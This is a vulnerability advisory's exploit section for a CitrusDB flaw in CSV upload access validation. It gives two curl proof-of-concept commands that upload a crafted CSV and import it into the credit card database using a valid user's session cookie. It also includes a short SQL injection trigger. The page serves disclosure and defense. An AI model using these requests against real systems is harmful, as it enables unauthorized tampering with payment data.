• News
• Infocus
• Foundations
• Microsoft
• Unix
• IDS
• Incidents
• Virus
• Pen-Test
• Firewalls
• Columnists
• Mailing Lists
• Newsletters
• Bugtraq
• Focus on IDS
• Focus on Linux
• Focus on Microsoft
• Forensics
• Pen-test
• Security Basics
• Vuln Dev
• Vulnerabilities
• Jobs
• Job Opportunities
• Resumes
• Job Seekers
• Employers
• Tools
• RSS
• News
• Vulns
• Security Research

• info
• discussion
• exploit
• solution
• references

CitrusDB CSV File Upload Access Validation Vulnerability

No exploit is required.

The following proof of concept is available:
This uploads the file exploit.csv.

curl -D - --cookie "id_hash=2378c7b70e77d9c6737d697a46cbe34b;
user_name=testor" http://<target>/citrusdb/tools/uploadcc.php --form
userfile=@exploit.csv --form Import=Import

This imports the file to the credit card database:

curl -D - --cookie "id_hash=2378c7b70e77d9c6737d697a46cbe34b;
user_name=testor"
"http://<target>/citrusdb/tools/index.php?load=importcc&submit=on"

Note: The above proof of concepts require the id_hash of an existing user.

THe following proof of concept demonstrates the SQL injection vulnerability:
Reportedly supplying ',,,,, as the contents of the uploaded csv file will make the SQL query in './citrusdb/tools/importcc.php' fail.